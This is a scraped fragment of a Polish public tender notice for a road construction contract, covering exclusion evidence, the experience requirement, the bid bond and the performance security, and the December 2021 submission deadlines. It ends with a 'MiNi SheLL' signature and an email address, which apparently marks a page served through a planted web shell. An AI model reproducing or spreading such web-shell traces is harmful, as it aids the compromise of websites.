Wykonawcę, którego oferta została najwyżej oceniona, do złożenia <br/>w wyznaczonym terminie, nie krótszym niż 10 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających: <br/>- brak podstaw wykluczenia: <br/>11.2.1 Informacja z Krajowego Rejestru Karnego w zakresie: <br/>a) art.108 ust. 1 pkt 1 i 2 Pzp, <br/>b) art.108 ust. 1 pkt 4 Pzp dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego, <br/>- sporządzanej nie wcześniej niż 6 miesięcy przed jej złożeniem; <br/>11.2.2 Oświadczenie Wykonawcy, w zakresie art.108 ust. 5 pkt 5 Pzp o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji <br/>i konsumentów ( tekst jednolity Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; <br/>11.2.3 Oświadczenia Wykonawcy o aktualności zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, <br/>o których mowa w: <br/>a) art. 108 ust. 1 pkt 3 Pzp, <br/>b) art.108 ust. 1 pkt 4 Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie tytułem środka zapobiegawczego, <br/>c) art.108 ust.1 pkt 5 Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego <br/>na celu zakłócenie konkurencji, <br/>d) art. 108 ust. 1 pkt 6 Pzp; <br/>11.2.5 odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/>- sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. <br/>nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/> Wykazu narzędzi wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy <br/>w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. <br/> Odpisu albo informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji <br/>o Działalności gospodarczej – składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, <br/>nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu <br/>z wierzycielami, jego działalność gospodarcza nie jest zawieszona nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1 Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy tj. o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w pkt. 5 i 6 SWZ. <br/>Wykonawca wykaże że wykonał należycie minimum 1 robotę budowlaną <br/>(w rozumieniu ustawy z dnia 7 lipca 1994 r. &#34;Prawo budowlane&#34; (t. j. Dz. U. z 2020, poz. 1333 z późn. zm. oraz przepisów wykonawczych do tej ustawy) o wartości nie mniejszej jak: 2 000 000,00zł ( dwa miliony złotych 00/100) netto polegającą na budowie, przebudowie lub remoncie drogi <br/>o nawierzchni bitumicznej - w okresie ostatnich 3 lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. <br/>Wartość robót w walucie innej niż PLN, wykonawca powinien przeliczyć na PLN wg średniego kursu NBP z dnia zawarcia umowy o wykonanie robót, natomiast w przypadku braku przeliczenia przez wykonawcę Zamawiający dokona przeliczenia na PLN wg kursu średniego NBP z dnia zawarcia umowy o wykonanie robót.,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 11.2.3 Oświadczenia Wykonawcy o aktualności zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, <br/>o których mowa w: <br/>a) art. 108 ust. 1 pkt 3 Pzp, <br/>b) art.108 ust. 1 pkt 4 Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie tytułem środka zapobiegawczego, <br/>c) art.108 ust.1 pkt 5 Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego <br/>na celu zakłócenie konkurencji, <br/>d) art. 108 ust. 1 pkt 6 Pzp; <br/>11.2.5 odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/>- sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> W niniejszym postępowaniu Zamawiający wymaga złożenia wadium w wysokości 3% wartości zamówienia brutto: <br/>13.2 Wadium należy wnieść przed upływem terminu składania ofert, który Zamawiający określił następująco:<br/> do dnia 17.12.2021r. do godz. 9:00.<br/>Wadium musi obejmować okres związania ofertą, który rozpoczyna się wraz z upływem terminu składania ofert określonym w pkt. 15 ppkt. 3 SWZ, gdyż stanowi zabezpieczenie złożonej przez Wykonawcę oferty.<br/>13.3 Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>•	pieniądzu;<br/>•	gwarancjach ubezpieczeniowych;<br/>•	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r. poz. 359 i 2260 oraz 2017 r. poz. 1089).<br/>13.4 Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek Zamawiającego na konto <br/>nr 29 1240 4227 1111 0000 4847 4168 z adnotacją: „Wadium - nr sprawy: 271.2.11.2021.<br/> Za datę wniesienia wadium w pieniądzu uważa się datę uznania na rachunku Zamawiającego.<br/>13.5 Wadium wniesione w formie poręczeń lub (i) gwarancji będzie akceptowane przez Zamawiającego, jeżeli będzie zawierać wszystkie określone ustawą PZP przypadki utraty wadium przez Wykonawcę, którego oferta została wybrana, klauzulę o nieodwołalności oraz zapewnienie bezwarunkowej wypłaty przez Gwaranta na pierwsze pisemne żądanie Zamawiającego pełnej kwoty wadium we wszystkich przypadkach wymienionych w art. 97 ustawy PZP.<br/>13.6 Zwrot lub zatrzymanie wadium nastąpi zgodnie z zasadami art. 98 ustawy PZP.<br/>13.6.1 Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.<br/>13.7 Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach opisanych w art. 98 ust. 6 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawca wniesieł zabezpieczenie należytego wykonania umowy w wysokości 3 % wynagrodzenia brutto tj.:<br/>2. Zabezpieczenie należytego wykonania umowy służy do pokrycia roszczeń Zamawiającego z tytułu niewykonania lub nienależytego wykonania umowy, a zwłaszcza z tytułu odpowiedzialności odszkodowawczej, kar umownych.<br/>3. Zamawiający zwróci 70% zabezpieczenia należytego wykonania umowy w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego jako należycie wykonane, zgodnie z zasadami określonymi w umowie w sprawie zamówienia publicznego.<br/>4. 30% zabezpieczenia należytego wykonania umowy pozostawione na zabezpieczenie roszczeń z tytułu rękojmi za wady zostanie zwrócona nie później niż w 15 dniu po upływie okresu rękojmi.<br/>Wykonawca jest uprawniony w każdym czasie do zmiany formy zabezpieczenia należytego wykonania umowy pod warunkiem, że zmiana formy będzie dokonana z zachowaniem ciągłości zabezpieczenia, a nowe zabezpieczenie będzie spełniać wymogi określone w SWZ.<br/>5. Jeżeli w zabezpieczeniu należytego wykonania umowy wniesionym w postaci gwarancji lub poręczeniu zawarty będzie wymóg informowania gwaranta (poręczyciela) o zmianach umowy bądź uzyskiwania jego akceptacji w tym zakresie, Wykonawca będzie zobowiązany – przed podpisaniem każdego aneksu do umowy – przedstawić Zamawiającemu potwierdzenie poinformowania gwaranta (poręczyciela) o zmianach umowy bądź jego akceptację tych zmian albo wnieść nowe zabezpieczenie. W przypadku, gdy zmiana umowy powoduje konieczność zmiany zabezpieczenia, Wykonawca zobowiązany będzie dostarczyć aneks do obecnego zabezpieczenia, uzupełnić zabezpieczenie lub wnieść nowe zabezpieczenie przed terminem podpisania aneksu.<br/>6. W przypadku, gdy okres realizacji umowy będzie dłuższy niż okres obowiązywania zabezpieczenia należytego wykonania umowy wniesionego w postaci gwarancji lub poręczenia Wykonawca zobowiązany będzie przed upływem okresu obowiązywania pierwotnego zabezpieczenia należytego wykonania umowy do przedłożenia kolejnego zabezpieczenia (spełniającego wymogi określone w SWZ) na dalszy okres.<br/>7. W razie uchybienia zobowiązaniom określonym w ust. 5 lub 6, Zamawiający uprawniony będzie do żądania wypłaty przez gwaranta (poręczyciela) kwoty zabezpieczenia, która zostanie zatrzymana przez Zamawiającego jako zabezpieczenie wniesione w pieniądzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Informacje dotyczące zakresu, rodzaju zmiany umowy oraz warunków ich wprowadzenia zostały<br/>określone w § 17 umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym: https://miniportal.uzp.gov.pl/, ePUAP: http://epuap.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-17 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com